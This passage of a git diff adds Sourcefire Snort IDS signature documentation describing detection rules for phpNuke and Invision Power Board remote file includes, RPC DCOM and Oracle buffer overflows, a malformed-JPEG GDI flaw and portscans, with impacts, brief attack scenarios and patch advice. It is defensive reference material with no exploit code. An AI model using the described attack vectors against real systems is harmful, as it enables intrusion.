+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/399.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+399
+
+--
+
+Summary:
+This event is generated when An ICMP Host Unreachable datagram is detected on the network.  
+
+--
+
+Impact:
+Routers will generate this message when the route to the destination host on a directly connected network is not available.  This occurs when no ARP response is received from the destination network.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000376.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000376
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_db_utilities.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_db_utilities.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1005.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1005
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3189.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3189
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1182.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1182
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2773.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2773
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_nchar
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/858.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+858
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3294.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3294
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1154.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1154
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/996.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+996
+
+
+--
+Summary:
+This event is generated when an attempt is made to request an HTTP-based password change.
+
+--
+Impact:
+Information gathering/remote access.  Error messages from failed password changes can indicate whether a given account exists on the server.  Successful password changes can allow remote access to the server. 
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) Version 4 supplies a feature to allow users to make remote password changes.  The iisadmpwd directory has several .HTR files that are used to implement the password changes.  An attacker can request a change and use a returned form to supply an account name, existing password, and new password either to brute force changes or discover whether a specific account name exist. 
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0
+
+--
+Attack Scenarios:
+An attacker can request password changes to discover existing accounts or brute force password changes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the IISADMPWD virtual directory to disable remote password changes.
+
+Consider running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0407
+
+Bugtraq
+http://www.securityfocus.com/bid/2110
+
+--
--- /dev/null
+++ b/doc/signatures/122-20.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-20
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+distributed portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/1938.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1938
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command XTND.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by 
+sending a large number of non-line feed characters before a line feed
+to a POP server via the XTND command.
+
+--
+Attack Scenarios:
+Simple. An attacker can supply many consecutive non-newline characters to
+the XTND function on a POP server to cause the overflow condition. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC 1082:
+http://www.faqs.org/rfcs/rfc1082.html
+
+--
--- /dev/null
+++ b/doc/signatures/2552.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2552
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3405.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3405
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2886.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2886
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure define_site_priority
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/929.txt
@@ -0,0 +1,62 @@
+SID:
+929
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/2357.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2357
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application WebChat.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+WebChat contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable
+WEBCHATPATH when making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file english.php.
+
+--
+Affected Systems:
+	Webdev Webchat 0.77
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the WEBCHATPATH variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000330.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000330
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Invision Power Board" application running on a webserver. Access to the file "moderate.php" using a remote file being passed as the "df" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "df" parameter in the "moderate.php" script used by the "Invision Power Board" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Invision Power Board
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1038.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1038
+
+--
+Summary:
+This event is generated when an attempt is made to access the Microsoft Site Server site configuration file. 
+
+--
+Impact:
+Intelligence gathering.  This attack may permit the viewing of the site configuration file, which may contain sensitive information such as the username and password used by the Ad Server to access SQL databases. 
+
+--
+Detailed Information:
+Microsoft Site Server Commerce Edition 3.0 contains an AdSamples directory, which is provided for instruction and demonstration of the Ad Server capabilities.  Unless directory permissions are altered, an attacker may view the site configuration file, site.csc.  This contains sensitive information such as username and password that may be used to gain unauthorized access to SQL databases.
+
+--
+Affected Systems:
+Microsoft Site Server Commerce Edition 3.0
+
+--
+Attack Scenarios:
+An attacker can craft a URL to reference the site.csc file to view sensitive information. 
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Delete the directory containing the sample code if it is not required.
+
+Restrict access to the sample code directory. 
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1520
+
+Bugtraq
+http://www.securityfocus.com/bid/256
+
+
+--
--- /dev/null
+++ b/doc/signatures/2867.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2867
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_unique_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2707.txt
@@ -0,0 +1,75 @@
+Rule: 
+
+--
+Sid: 
+2707
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft GDI using a malformed JPEG image.
+
+-- 
+
+Impact: 
+Serious. Execution of arbitrary code is possible. Denial of Service
+(DoS),
+
+--
+Detailed Information:
+The Microsoft Graphics Device Interface contains a programming error
+in the handling of Joint Photographics Experts Group (JPEG) files. This
+error may allow an attacker to execute code of their choosing on a
+vulnerable system.
+
+Due to the popularity of jpeg files, and in order to provide accurate
+detection for the GDI JPEG vulnerability, sid 2705 may generate false
+positive events in certain situations. Since this rule may generate
+a number of false positives it is disabled by default.
+
+In order to avoid potential evasion techniques, http_inspect should be
+configured with "flow_depth 0" so that all HTTP server response traffic is
+inspected.
+
+WARNING
+Setting flow_depth 0 will cause performance problems in some situations.
+WARNING
+
+--
+Affected Systems:
+	All Microsoft systems including multiple Microsoft products
+
+--
+Attack Scenarios: 
+An attacker would need to supply a malformed jpeg image to a victim and
+have the use attempt to view the file.
+
+-- 
+Ease of Attack: 
+Medium.
+
+-- 
+
+False Positives:
+False positive events are known to occur with this rule, the incidence
+is low but may be an inconvenience in some installations.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
